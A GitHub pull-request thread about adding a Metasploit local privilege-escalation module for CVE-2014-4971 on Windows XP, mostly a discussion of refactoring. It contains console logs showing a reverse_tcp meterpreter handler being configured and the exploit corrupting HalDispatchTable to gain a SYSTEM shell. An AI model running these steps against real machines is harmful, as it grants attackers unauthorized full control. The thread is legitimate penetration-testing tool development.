Cve 2014 4971 bthpan exploit

[KoreLogicSecurity]

Resubmitting after unwinding some repo breakage I caused - this is logically a continuation of closed PR #3563, including the style fixes from @todb-r7.

Up-to-date example in action, as requested by @todb:

msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.1:4445
msf exploit(handler) > [*] Starting the payload handler...
popm
msf exploit(bthpan) >
[*] Sending stage (769536 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.1:4445 -> 192.168.1.1:37139) at 2014-08-14 17:19:17 -0400

msf exploit(bthpan) > set SESSION 1
SESSION => 1
msf exploit(bthpan) > rexploit -j
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.1:4444
msf exploit(bthpan) > [*] Disclosing the HalDispatchTable address...
[+] Address successfully disclosed.
[*] Storing the shellcode in memory...
[+] Kernel stager successfully stored at 0x1
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Privilege escalation successful!
[*] Injecting 287 bytes to memory and executing it...
[*] Sending stage (769536 bytes) to 192.168.1.1
[*] Meterpreter session 2 opened (192.168.1.1:4444 -> 192.168.1.1:44076) at 2014-08-14 17:19:45 -0400

msf exploit(bthpan) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  WCB614-J20\kore @ WCB614-J20      192.168.1.1:4445 -> 192.168.1.1:37139 (10.0.2.15)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WCB614-J20  192.168.1.1:4444 -> 192.168.1.1:44076 (10.0.2.15)

[todb]

Ah cool, thanks! Will land in the morning. Pinkie swear.

[todb]

Btw (maybe on IRC?) If you could elaborate on the repo breakage I'd love to hear it - I know a lot of people hit pitfalls with git so if there's advice to be given there, might be helpful to capture for other contributors.

[Meatballs1]

@todb I fundamentally disagree with:

"I don't think @zeroSteiner's refactors are a blocker (it would mean more work on @korelogic's part with not a huge upside)."

We have so many issues that crop up in metasploit because of copy and pasted code. The refactors should be pretty simple to implement.

[todb-r7]

@Meatballs1 okey. let me take a look. I'm guessing you're talking about #3612. If it's easy to implement, I'll do it. Yes, there is a ton of copy/paste, and yes, it hurts me to land more. "It was like that when I got there," is pretty weak of an excuse... but that said, we can't block module submissions forever due to changing (better) libraries. We can always fix later, if "we" includes someone who feels strongly enough about it to do the typing and testing.

IOW, I could spend hours on pretty much every single module we ship today making it more perfect, but perfect is the enemy of progress.

[kernelsmith]

I think there’s a difference between perfection and simple refactoring against code that already exists.
I’m with Meatballs on this one. An alternative is a way of ensuring that the corrections are made later, whether that’s a bug ticket or whatever, but you always run the risk of it not getting done.
Best option is to have KoreLogic refactor since they probably already have the test env for it.

On Aug 15, 2014, at 11:08 AM, Tod Beardsley notifications@github.com wrote:

@Meatballs1 okey. let me take a look. I'm guessing you're talking about #3612. If it's easy to implement, I'll do it. Yes, there is a ton of copy/paste, and yes, it hurts me to land more. "It was like that when I got there," is pretty weak of an excuse... but that said, we can't block module submissions forever due to changing (better) libraries. We can always fix later, if "we" includes someone who feels strongly enough about it to do the typing and testing.

IOW, I could spend hours on pretty much every single module we ship today making it more perfect, but perfect is the enemy of progress.

—
Reply to this email directly or view it on GitHub.

[Meatballs1]

Saying it will get done later never happens. Where I've submitted refactors for existing code they basically don't get touched for fear of breaking stuff.

p.s. July 22nd isn't really forever in the MSF schedule of pull requests :)

[kernelsmith]

I disagree, later does happen sometimes, but often does not. There would have to be a forcing function if that is going to be the approach however, and we have a weak one at best.

and specs are the solution to “fear of breaking stuff"

On Aug 15, 2014, at 1:47 PM, Meatballs1 notifications@github.com wrote:

Saying it will get done later never happens. Where I've submitted refactors for existing code they basically don't get touched for fear of breaking stuff.

p.s. July 22nd isn't really forever in the MSF schedule of pull requests :)

—
Reply to this email directly or view it on GitHub.

[KoreLogicSecurity]

No argument with refactoring. If you need us to do so before landing, we won't have the bandwidth to do so until sometime next week.

[kernelsmith]

@korelogic

@meatballs could always PR your repo to add the refactor :)

On Aug 15, 2014, at 1:47 PM, Meatballs1 notifications@github.com wrote:

Saying it will get done later never happens. Where I've submitted refactors for existing code they basically don't get touched for fear of breaking stuff.

p.s. July 22nd isn't really forever in the MSF schedule of pull requests :)

—
Reply to this email directly or view it on GitHub.

[Meatballs1]

Done, no idea if it works:
https://github.com/KoreLogicSecurity/metasploit-framework/pull/3

Is a bit messy diff cos of pulling in master.

Meatballs1@2cc78fd

[todb-r7]

@KoreLogicSecurity if you could take a look at the diff'ed file (all you really care about is 2cc78fd) and confirm the module is still functional, then I can land it with the refactored changes (a new screenshot would be nice proof).

@Meatballs1 I understand and often agree with the lament that things "never" get refactored after they land, but the work on @zeroSteiner's changes in particular produced some fairly immediate changes in affected modules. I would hope that since the work is recent, the fire is still there, even if this run at the refactor doesn't land. Especially since we're tagging @zeroSteiner all over the place in this PR.

[todb-r7]

Incidentally, a test merge of @Meatballs1 stuff to this PR did produce the desired effect:

$ git m Meatballs1/pr_3651

You need a passphrase to unlock the secret key for
user: "Tod Beardsley <todb@metasploit.com>"
2048-bit RSA key, ID ADB9F193, created 2012-11-27

Merge made by the 'recursive' strategy.
 modules/exploits/windows/local/bthpan.rb | 114 ++++++++-----------------------
 1 file changed, 28 insertions(+), 86 deletions(-)
[*] Running msftidy.rb in .git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/msftidy.rb ---
modules/exploits/windows/local/bthpan.rb - msftidy check passed
------------------------------------------------------------------------
[ruby-1.9.3-p547@metasploit-framework] (temp) 
todb@mazikeen:~/git/rapid7/metasploit-framework
$ 

[zeroSteiner]

I would be happy to help refactor this module before or after it lands but it appears @Meatballs1 has already handled it.

[infodox]

Just a wild thought I had re: structure of post exploitation local/privesc modules.

Instead of spawning a new session, there perhaps could be an option for it to instead simply elevate the privs of the current session? Perhaps by token passing (Windows) or some kind of witchcraft on Linux/OSX that I have not yet dreamed up?

Just a wild thought, while bored stupid at an airport.

[KoreLogicSecurity]

Revised the module again, to use msf/core/exploit/local/windows_kernel. It required some small tweaks from todb's proposed code.

Pushed the updated and tested module. Here's current example output:

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||
       =[ metasploit v4.10.1-dev [core:4.10.1.pre.dev api:1.0.0]]
+ -- --=[ 1349 exploits - 743 auxiliary - 218 post        ]
+ -- --=[ 341 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf exploit(handler) > use exploit/windows/local/bthpan                                                                                                             
msf exploit(bthpan) > show options
Module options (exploit/windows/local/bthpan):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
Exploit target:
   Id  Name
   --  ----
   0   Windows XP SP3
msf exploit(bthpan) >  use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.5.35
LHOST => 192.168.5.35
msf exploit(handler) > set LPORT 4445
LPORT => 4445
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.35:4445 
[*] Starting the payload handler...
msf exploit(handler) > use exploit/windows/local/bthpan
msf exploit(bthpan) > 
[*] Sending stage (769536 bytes) to 192.168.5.35
[*] Meterpreter session 1 opened (192.168.5.35:4445 -> 192.168.5.35:53293) at 2014-10-08 11:32:06 -0400
msf exploit(bthpan) > sessions -l
Active sessions
===============
  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  WCB614-J20\kore @ WCB614-J20  192.168.5.35:4445 -> 192.168.5.35:53293 (10.0.2.15)
msf exploit(bthpan) > show options
Module options (exploit/windows/local/bthpan):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
Exploit target:
   Id  Name
   --  ----
   0   Windows XP SP3
msf exploit(bthpan) > set SESSION 1
SESSION => 1
msf exploit(bthpan) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.35:4444 
msf exploit(bthpan) > [*] Disclosing the HalDispatchTable address...
[+] Address successfully disclosed.
[*] Storing the shellcode in memory...
[+] Kernel stager successfully stored at 0x1
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Privilege escalation successful!
[*] Injecting 287 bytes to memory and executing it...
[*] Sending stage (769536 bytes) to 192.168.5.35
msf exploit(bthpan) > [*] Meterpreter session 2 opened (192.168.5.35:4444 -> 192.168.5.35:59211) at 2014-10-08 12:18:16 -0400
msf exploit(bthpan) > sessions -l
Active sessions
===============
  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  WCB614-J20\kore @ WCB614-J20      192.168.5.35:4445 -> 192.168.5.35:53293 (10.0.2.15)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WCB614-J20  192.168.5.35:4444 -> 192.168.5.35:59211 (10.0.2.15)
msf exploit(bthpan) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.0.2.15 - Meterpreter session 2 closed.  Reason: User exit

Please let us know if we should issue a new pull request, or if this is sufficient. Thanks!

[todb-r7]

Ah cool, reopening then.

[KoreLogicSecurity]

@todb-r7 sweet, thanks!